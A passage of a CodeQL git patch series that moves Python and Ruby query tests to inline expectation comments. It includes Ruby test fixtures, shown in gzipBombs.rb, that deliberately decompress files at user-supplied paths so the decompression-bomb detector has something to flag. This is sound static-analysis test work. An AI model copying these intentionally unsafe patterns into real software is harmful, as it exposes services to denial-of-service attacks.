# $ Alert[py/unused-global-variable] @@ -130,7 +130,7 @@ class C(object): #FP observed def test_dict_unpacking(queryset, field_name, value): #True positive - for tag in value.split(','): + for tag in value.split(','): # $ Alert[py/unused-loop-variable] queryset = queryset.filter(**{field_name + '__name': tag1}) return queryset #False positive diff --git a/python/ql/test/query-tests/Variables/unused_local_nonlocal/UnusedLocalVariable.qlref b/python/ql/test/query-tests/Variables/unused_local_nonlocal/UnusedLocalVariable.qlref index bd6e5aaa069d..122b9d6456f6 100644 --- a/python/ql/test/query-tests/Variables/unused_local_nonlocal/UnusedLocalVariable.qlref +++ b/python/ql/test/query-tests/Variables/unused_local_nonlocal/UnusedLocalVariable.qlref @@ -1 +1,2 @@ -Variables/UnusedLocalVariable.ql +query: Variables/UnusedLocalVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Variables/unused_local_nonlocal/variables_test.py b/python/ql/test/query-tests/Variables/unused_local_nonlocal/variables_test.py index 4986a6f4eb3f..da7f7dcf7e5e 100644 --- a/python/ql/test/query-tests/Variables/unused_local_nonlocal/variables_test.py +++ b/python/ql/test/query-tests/Variables/unused_local_nonlocal/variables_test.py @@ -29,7 +29,7 @@ def not_fp(): def nonlocal_test(): nonlocal test def set_test(): - test = True + test = True # $ Alert nonlocal_test() set_test() if test: diff --git a/python/ql/test/query-tests/analysis/Consistency/Consistency.qlref b/python/ql/test/query-tests/analysis/Consistency/Consistency.qlref index 6abbdd6dd64d..0343f08ebf44 100644 --- a/python/ql/test/query-tests/analysis/Consistency/Consistency.qlref +++ b/python/ql/test/query-tests/analysis/Consistency/Consistency.qlref @@ -1 +1 @@ -analysis/Consistency.ql +query: analysis/Consistency.ql diff --git a/python/ql/test/query-tests/analysis/jump_to_defn/Definitions.qlref b/python/ql/test/query-tests/analysis/jump_to_defn/Definitions.qlref index d4e89a35c97f..cb6af4ba5b57 100644 --- a/python/ql/test/query-tests/analysis/jump_to_defn/Definitions.qlref +++ b/python/ql/test/query-tests/analysis/jump_to_defn/Definitions.qlref @@ -1 +1 @@ -analysis/Definitions.ql +query: analysis/Definitions.ql diff --git a/python/ql/test/query-tests/analysis/pointsto/FailedInference.qlref b/python/ql/test/query-tests/analysis/pointsto/FailedInference.qlref index b08adfa00b57..991e596544b2 100644 --- a/python/ql/test/query-tests/analysis/pointsto/FailedInference.qlref +++ b/python/ql/test/query-tests/analysis/pointsto/FailedInference.qlref @@ -1 +1 @@ -analysis/FailedInference.ql +query: analysis/FailedInference.ql diff --git a/python/ql/test/query-tests/analysis/pointsto/KeyPointsToFailure.qlref b/python/ql/test/query-tests/analysis/pointsto/KeyPointsToFailure.qlref index db945187917b..bd2bce681851 100644 
--- a/python/ql/test/query-tests/analysis/pointsto/KeyPointsToFailure.qlref
+++ b/python/ql/test/query-tests/analysis/pointsto/KeyPointsToFailure.qlref
@@ -1 +1,2 @@
-analysis/KeyPointsToFailure.ql
\ No newline at end of file
+query: analysis/KeyPointsToFailure.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/analysis/pointsto/Pruned.qlref b/python/ql/test/query-tests/analysis/pointsto/Pruned.qlref
index 2d2c28dbc261..ab448a5dfe67 100644
--- a/python/ql/test/query-tests/analysis/pointsto/Pruned.qlref
+++ b/python/ql/test/query-tests/analysis/pointsto/Pruned.qlref
@@ -1 +1 @@
-analysis/Pruned.ql
+query: analysis/Pruned.ql
diff --git a/python/ql/test/query-tests/analysis/suppression/AlertSuppression.qlref b/python/ql/test/query-tests/analysis/suppression/AlertSuppression.qlref
index 9d7833eccae7..dc898fca718c 100644
--- a/python/ql/test/query-tests/analysis/suppression/AlertSuppression.qlref
+++ b/python/ql/test/query-tests/analysis/suppression/AlertSuppression.qlref
@@ -1 +1 @@
-AlertSuppression.ql
+query: AlertSuppression.ql
From 9ea3e9088c3567d4cdaadc54f36b30ffb7b65e75 Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:52 +0200 Subject: [PATCH 06/15] Ruby --- .../dataflow/params/TypeTracker.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../query-tests/analysis/Definitions.qlref | 2 +- .../diagnostics/ExtractedFiles.qlref | 2 +- .../diagnostics/ExtractionErrors.qlref | 2 +- .../diagnostics/ExtractionWarnings.qlref | 2 +- .../NumberOfFilesExtractedWithErrors.qlref | 2 +- .../NumberOfSuccessfullyExtractedFiles.qlref | 2 +- .../DecompressionBombs.expected | 42 ++--- .../DecompressionBombs.qlref | 3 +- .../CWE-522-DecompressionBombs/gzipBombs.rb | 16 +- .../CWE-522-DecompressionBombs/zipBombs.rb | 28 +-- .../ImproperLdapAuth.expected | 6 +- .../ImproperLdapAuth/ImproperLdapAuth.qlref | 3 +- .../ImproperLdapAuth/ImproperLdapAuth.rb | 8 +- .../InsecureRandomness.expected | 4 +- .../InsecureRandomness.qlref | 3 +- .../InsecureRandomness/InsecureRandomness.rb | 2 +- .../LdapInjection/LdapInjection.rb | 12 +- .../LdapInjection/Ldapinjection.expected | 10 +- .../LdapInjection/Ldapinjection.qlref | 3 +- .../TemplateInjection/ErbInjection.rb | 6 +- .../TemplateInjection/SlimInjection.rb | 6 +- .../TemplateInjection.expected | 10 +- .../TemplateInjection/TemplateInjection.qlref | 3 +- .../XPathInjection/LibxmlInjection.rb | 6 +- .../XPathInjection/NokogiriInjection.rb | 12 +- .../XPathInjection/RexmlInjection.rb | 8 +- .../XPathInjection/XPathInjection.expected | 22 +-- .../XPathInjection/XPathInjection.qlref | 3 +- .../cwe-022-ZipSlip/ZipSlip.expected | 14 +- .../cwe-022-ZipSlip/ZipSlip.qlref | 3 +- .../experimental/cwe-022-ZipSlip/zip_slip.rb | 24 +-- .../cwe-176/UnicodeBypassValidation.qlref | 2 +- .../experimental/cwe-347/EmptyJWTSecret.qlref | 3 +- .../experimental/cwe-347/EmptyJWTSecret.rb | 4 +- .../cwe-347/MissingJWTVerification.qlref | 3 +- .../cwe-347/MissingJWTVerification.rb | 8 +- .../UnsafeYamlDeserialization.expected | 30 +-- .../cwe-502/UnsafeYamlDeserialization.qlref | 3 +- 
.../cwe-502/UnsafeYamlDeserialization.rb | 34 ++-- .../ManuallyCheckHttpVerb.expected | 16 +- .../ManuallyCheckHttpVerb.qlref | 3 +- .../ManuallyCheckHttpVerb.rb | 24 +-- .../weak-params/WeakParams.expected | 10 +- .../experimental/weak-params/WeakParams.qlref | 3 +- .../experimental/weak-params/WeakParams.rb | 8 +- .../query-tests/metrics/FLines/FLines.qlref | 2 +- .../metrics/FLines/FLinesOfCode.qlref | 2 +- .../metrics/FLines/FLinesOfComments.qlref | 2 +- .../performance/UseDetect/UseDetect.qlref | 3 +- .../performance/UseDetect/UseDetect.rb | 14 +- .../IncompleteHostnameRegExp.qlref | 3 +- .../IncompleteHostnameRegExp/hosttest.rb | 6 +- .../tst-IncompleteHostnameRegExp.rb | 48 ++--- .../IncompleteUrlSubstringSanitization.qlref | 3 +- .../tst-IncompleteUrlSubstringSanitization.rb | 50 ++--- .../MissingFullAnchor.expected | 8 +- .../MissingFullAnchor/MissingFullAnchor.qlref | 3 +- .../MissingFullAnchor/impl/miss-anchor.rb | 12 +- .../MissingRegExpAnchor.qlref | 3 +- .../missing_regexp_anchor.rb | 38 ++-- .../OverlyLargeRangeQuery.qlref | 3 +- .../suspicous_regexp_range.rb | 22 +-- .../cwe-078/KernelOpen/KernelOpen.expected | 22 +-- .../cwe-078/KernelOpen/KernelOpen.qlref | 3 +- .../security/cwe-078/KernelOpen/KernelOpen.rb | 22 +-- .../NonConstantKernelOpen.qlref | 3 +- .../NonConstantKernelOpen.rb | 22 +-- .../UnsafeShellCommandConstruction.expected | 32 ++-- .../UnsafeShellCommandConstruction.qlref | 3 +- .../impl/sub/notImported.rb | 4 +- .../impl/sub/other.rb | 4 +- .../impl/sub/other2.rb | 4 +- .../impl/unsafeShell.rb | 44 ++--- .../security/cwe-079/ReflectedXSS.qlref | 2 +- .../security/cwe-079/StoredXSS.qlref | 2 +- .../cwe-079/UnsafeHtmlConstruction.expected | 10 +- .../cwe-079/UnsafeHtmlConstruction.qlref | 3 +- .../security/cwe-079/lib/unsafeHtml.rb | 16 +- .../security/cwe-089/ActiveRecordInjection.rb | 86 ++++----- .../security/cwe-089/ArelInjection.rb | 6 +- .../security/cwe-089/PgInjection.rb | 14 +- .../security/cwe-089/SqlInjection.expected | 98 
+++++----- .../security/cwe-089/SqlInjection.qlref | 3 +- .../UnsafeCodeConstruction.expected | 24 +-- .../UnsafeCodeConstruction.qlref | 3 +- .../UnsafeCodeConstruction/impl/unsafeCode.rb | 40 ++-- .../cwe-116/BadTagFilter/BadTagFilter.qlref | 3 +- .../security/cwe-116/BadTagFilter/test.rb | 28 +-- .../IncompleteSanitization.qlref | 3 +- .../cwe-116/IncompleteSanitization/tst.rb | 100 +++++----- .../security/cwe-117/LogInjection.expected | 16 +- .../security/cwe-117/LogInjection.qlref | 3 +- .../app/controllers/users_controller.rb | 18 +- .../cwe-1333-exponential-redos/ReDoS.qlref | 3 +- .../cwe-1333-exponential-redos/tst.rb | 174 +++++++++--------- .../PolynomialReDoS.expected | 58 +++--- .../PolynomialReDoS.qlref | 3 +- .../PolynomialReDoS.rb | 66 +++---- .../cwe-1333-polynomial-redos/lib/index.rb | 10 +- .../RegExpInjection.expected | 12 +- .../RegExpInjection.qlref | 3 +- .../RegExpInjection.rb | 20 +- .../cwe-134/TaintedFormatString.expected | 28 +-- .../cwe-134/TaintedFormatString.qlref | 3 +- .../security/cwe-134/tainted_format_string.rb | 26 +-- .../cwe-209/StackTraceExposure.expected | 8 +- .../security/cwe-209/StackTraceExposure.qlref | 3 +- .../security/cwe-209/StackTraceExposure.rb | 8 +- .../query-tests/security/cwe-295/Excon.rb | 10 +- .../query-tests/security/cwe-295/Faraday.rb | 8 +- .../security/cwe-295/HttpClient.rb | 2 +- .../query-tests/security/cwe-295/Httparty.rb | 10 +- .../query-tests/security/cwe-295/NetHttp.rb | 2 +- .../query-tests/security/cwe-295/OpenURI.rb | 12 +- .../cwe-295/RequestWithoutValidation.qlref | 3 +- .../security/cwe-295/RestClient.rb | 8 +- .../query-tests/security/cwe-295/Typhoeus.rb | 4 +- .../cwe-312/CleartextLogging.expected | 46 ++--- .../security/cwe-312/CleartextLogging.qlref | 3 +- .../cwe-312/CleartextStorage.expected | 58 +++--- .../security/cwe-312/CleartextStorage.qlref | 3 +- .../app/controllers/users_controller.rb | 46 ++--- .../security/cwe-312/app/models/user.rb | 12 +- 
.../query-tests/security/cwe-312/logging.rb | 58 +++--- .../cwe-327/BrokenCryptoAlgorithm.qlref | 3 +- .../cwe-327/WeakSensitiveDataHashing.expected | 16 +- .../cwe-327/WeakSensitiveDataHashing.qlref | 3 +- .../security/cwe-327/broken_crypto.rb | 36 ++-- .../security/cwe-327/weak_hashing.rb | 20 +- .../cwe-352/CSRFProtectionDisabled.qlref | 3 +- .../cwe-352/CSRFProtectionNotEnabled.qlref | 3 +- .../alternative_root_controller.rb | 2 +- .../app/controllers/application_controller.rb | 2 +- .../app/controllers/users_controller.rb | 2 +- .../cwe-352/railsapp/config/application.rb | 2 +- .../config/environments/development.rb | 2 +- .../config/environments/production.rb | 2 +- .../oj-global-options/OjGlobalOptions.rb | 4 +- .../UnsafeDeserialization.expected | 4 +- .../UnsafeDeserialization.qlref | 3 +- .../ox-global-options/OxGlobalOptions.rb | 4 +- .../UnsafeDeserialization.expected | 4 +- .../UnsafeDeserialization.qlref | 3 +- .../UnsafeDeserialization.expected | 56 +++--- .../UnsafeDeserialization.qlref | 3 +- .../UnsafeDeserialization.rb | 84 ++++----- .../HardcodedDataInterpretedAsCode.expected | 8 +- .../HardcodedDataInterpretedAsCode.qlref | 3 +- .../test/query-tests/security/cwe-506/tst.rb | 10 +- .../security/cwe-598/SensitiveGetQuery.qlref | 3 +- .../app/controllers/users_controller.rb | 6 +- .../security/cwe-601/UrlRedirect.expected | 22 +-- .../security/cwe-601/UrlRedirect.qlref | 3 +- .../security/cwe-601/UrlRedirect.rb | 20 +- .../cwe-611/libxml-backend/LibXmlBackend.rb | 10 +- .../cwe-611/libxml-backend/Xxe.expected | 10 +- .../security/cwe-611/libxml-backend/Xxe.qlref | 3 +- .../security/cwe-611/xxe/LibXmlRuby.rb | 18 +- .../security/cwe-611/xxe/Nokogiri.rb | 32 ++-- .../security/cwe-611/xxe/Xxe.expected | 48 ++--- .../security/cwe-611/xxe/Xxe.qlref | 3 +- .../security/cwe-732/FilePermissions.rb | 26 +-- .../cwe-732/WeakCookieConfiguration.qlref | 3 +- .../cwe-732/WeakFilePermissions.expected | 24 +-- .../cwe-732/WeakFilePermissions.qlref | 3 +- 
.../cwe-732/app/config/application.rb | 10 +- .../cwe-798/HardcodedCredentials.expected | 24 +-- .../cwe-798/HardcodedCredentials.qlref | 3 +- .../security/cwe-798/HardcodedCredentials.rb | 22 +-- .../ConditionalBypass.expected | 8 +- .../ConditionalBypass.qlref | 3 +- .../ConditionalBypass.rb | 10 +- .../cwe-912/HttpToFileAccess.expected | 6 +- .../security/cwe-912/HttpToFileAccess.qlref | 3 +- .../security/cwe-912/http_to_file_access.rb | 8 +- .../security/cwe-915/MassAssignment.expected | 44 ++--- .../security/cwe-915/MassAssignment.qlref | 3 +- .../test/query-tests/security/cwe-915/test.rb | 46 ++--- .../cwe-918/ServerSideRequestForgery.expected | 8 +- .../cwe-918/ServerSideRequestForgery.qlref | 3 +- .../cwe-918/ServerSideRequestForgery.rb | 8 +- .../DecompressionApi.expected | 6 +- .../decompression-api/DecompressionApi.qlref | 3 +- .../decompression-api/decompression_api.rb | 6 +- .../query-tests/summary/LinesOfCode.qlref | 2 +- .../query-tests/summary/LinesOfUserCode.qlref | 2 +- .../FrameworkModeAccessPaths.qlref | 2 +- .../modeleditor/FrameworkModeEndpoints.qlref | 2 +- .../utils/modeleditor/GenerateModel.qlref | 2 +- 191 files changed, 1401 insertions(+), 1346 deletions(-) diff --git a/ruby/ql/test/library-tests/dataflow/params/TypeTracker.qlref b/ruby/ql/test/library-tests/dataflow/params/TypeTracker.qlref index 2815162f7d8f..d3ee4a6ea04a 100644 --- a/ruby/ql/test/library-tests/dataflow/params/TypeTracker.qlref +++ b/ruby/ql/test/library-tests/dataflow/params/TypeTracker.qlref @@ -1 +1 @@ -library-tests/dataflow/type-tracker/TypeTracker.ql \ No newline at end of file +query: library-tests/dataflow/type-tracker/TypeTracker.ql diff --git a/ruby/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/ruby/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref index 9d7833eccae7..dc898fca718c 100644 --- a/ruby/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref +++ b/ruby/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref 
@@ -1 +1 @@
-AlertSuppression.ql
+query: AlertSuppression.ql
diff --git a/ruby/ql/test/query-tests/analysis/Definitions.qlref b/ruby/ql/test/query-tests/analysis/Definitions.qlref
index a8620aaeec6b..5d25fcc33076 100644
--- a/ruby/ql/test/query-tests/analysis/Definitions.qlref
+++ b/ruby/ql/test/query-tests/analysis/Definitions.qlref
@@ -1 +1 @@
-queries/analysis/Definitions.ql
+query: queries/analysis/Definitions.ql
diff --git a/ruby/ql/test/query-tests/diagnostics/ExtractedFiles.qlref b/ruby/ql/test/query-tests/diagnostics/ExtractedFiles.qlref
index d9d732152e22..ed3e1b70d3ec 100644
--- a/ruby/ql/test/query-tests/diagnostics/ExtractedFiles.qlref
+++ b/ruby/ql/test/query-tests/diagnostics/ExtractedFiles.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractedFiles.ql
\ No newline at end of file
+query: queries/diagnostics/ExtractedFiles.ql
diff --git a/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.qlref b/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.qlref
index ffbdb0a7b1b5..9169d655e25c 100644
--- a/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.qlref
+++ b/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractionErrors.ql
\ No newline at end of file
+query: queries/diagnostics/ExtractionErrors.ql
diff --git a/ruby/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref b/ruby/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref
index ff6e566d20a7..24af39e23262 100644
--- a/ruby/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref
+++ b/ruby/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractionWarnings.ql
+query: queries/diagnostics/ExtractionWarnings.ql
diff --git a/ruby/ql/test/query-tests/diagnostics/NumberOfFilesExtractedWithErrors.qlref b/ruby/ql/test/query-tests/diagnostics/NumberOfFilesExtractedWithErrors.qlref
index 17823cc88374..334f91d2d60a 100644
--- a/ruby/ql/test/query-tests/diagnostics/NumberOfFilesExtractedWithErrors.qlref
+++ b/ruby/ql/test/query-tests/diagnostics/NumberOfFilesExtractedWithErrors.qlref
@@ -1 +1 @@
-queries/summary/NumberOfFilesExtractedWithErrors.ql
\ No newline at end of file
+query: queries/summary/NumberOfFilesExtractedWithErrors.ql
diff --git a/ruby/ql/test/query-tests/diagnostics/NumberOfSuccessfullyExtractedFiles.qlref b/ruby/ql/test/query-tests/diagnostics/NumberOfSuccessfullyExtractedFiles.qlref
index 5f6eda05206f..35a0e05ddb1e 100644
--- a/ruby/ql/test/query-tests/diagnostics/NumberOfSuccessfullyExtractedFiles.qlref
+++ b/ruby/ql/test/query-tests/diagnostics/NumberOfSuccessfullyExtractedFiles.qlref
@@ -1 +1 @@
-queries/summary/NumberOfSuccessfullyExtractedFiles.ql
\ No newline at end of file
+query: queries/summary/NumberOfSuccessfullyExtractedFiles.ql
diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected
index e2f8d0cb2304..2631d47b89f4 100644
--- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected
+++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected
@@ -1,3 +1,24 @@ +#select +| gzipBombs.rb:6:3:6:34 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:6:3:6:34 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:7:3:9:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:7:3:9:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:10:3:14:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:10:3:14:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:15:22:15:53 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:15:22:15:53 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:20:3:20:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:20:3:20:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:21:3:21:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:21:3:21:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:25:3:25:40 | call to zcat | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:25:3:25:40 | call to zcat | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| zipBombs.rb:6:3:11:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:6:3:11:5 | call to open | This file Decompression depends on a $@. 
| zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:12:3:14:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:12:3:14:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:15:11:15:45 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:15:11:15:45 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:17:3:17:42 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:17:3:17:42 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:18:3:18:51 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:18:3:18:51 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:28:7:28:33 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:28:7:28:33 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:34:5:34:17 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:34:5:34:17 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:35:5:35:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:35:5:35:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:41:7:41:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:41:7:41:31 | call to read | This file Decompression depends on a $@. 
| zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:42:7:42:19 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:42:7:42:19 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:46:10:46:36 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:46:10:46:36 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:51:8:51:34 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:51:8:51:34 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:55:5:55:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:55:5:55:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | edges | gzipBombs.rb:4:3:4:11 | gzip_path | gzipBombs.rb:6:25:6:33 | gzip_path | provenance | | | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:4:15:4:27 | ...[...] | provenance | | 
@@ -91,24 +112,3 @@ nodes | zipBombs.rb:53:29:53:40 | zipfile_path | semmle.label | zipfile_path | | zipBombs.rb:55:5:55:31 | call to read | semmle.label | call to read | subpaths -#select -| gzipBombs.rb:6:3:6:34 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:6:3:6:34 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:7:3:9:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:7:3:9:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:10:3:14:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:10:3:14:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:15:22:15:53 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:15:22:15:53 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:20:3:20:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:20:3:20:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:21:3:21:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:21:3:21:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:25:3:25:40 | call to zcat | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:25:3:25:40 | call to zcat | This file Decompression depends on a $@. 
| gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| zipBombs.rb:6:3:11:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:6:3:11:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:12:3:14:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:12:3:14:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:15:11:15:45 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:15:11:15:45 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:17:3:17:42 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:17:3:17:42 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:18:3:18:51 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:18:3:18:51 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:28:7:28:33 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:28:7:28:33 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:34:5:34:17 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:34:5:34:17 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:35:5:35:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:35:5:35:31 | call to read | This file Decompression depends on a $@. 
| zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:41:7:41:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:41:7:41:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:42:7:42:19 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:42:7:42:19 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:46:10:46:36 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:46:10:46:36 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:51:8:51:34 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:51:8:51:34 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:55:5:55:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:55:5:55:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.qlref b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.qlref index c24a4cc9678e..e65789fc0d9a 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.qlref +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.qlref @@ -1 +1,2 @@ -experimental/CWE-522-DecompressionBombs/DecompressionBombs.ql \ No newline at end of file +query: experimental/CWE-522-DecompressionBombs/DecompressionBombs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/gzipBombs.rb b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/gzipBombs.rb index bf9bb7b329dc..1a7636809b13 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/gzipBombs.rb +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/gzipBombs.rb @@ -1,27 +1,27 @@ require 'zlib' class TestController < ActionController::Base - gzip_path = params[:path] + gzip_path = params[:path] # $ Source - Zlib::GzipReader.open(gzip_path).read + Zlib::GzipReader.open(gzip_path).read # $ Alert Zlib::GzipReader.open(gzip_path) do |uncompressedfile| puts uncompressedfile.read - end + end # $ Alert Zlib::GzipReader.open(gzip_path) do |uncompressedfile| uncompressedfile.each do |entry| puts entry end - end - uncompressedfile = Zlib::GzipReader.open(gzip_path) + end # $ Alert + uncompressedfile = Zlib::GzipReader.open(gzip_path) # $ Alert uncompressedfile.each do |entry| puts entry end - Zlib::GzipReader.new(File.open(gzip_path, 'rb')).read - 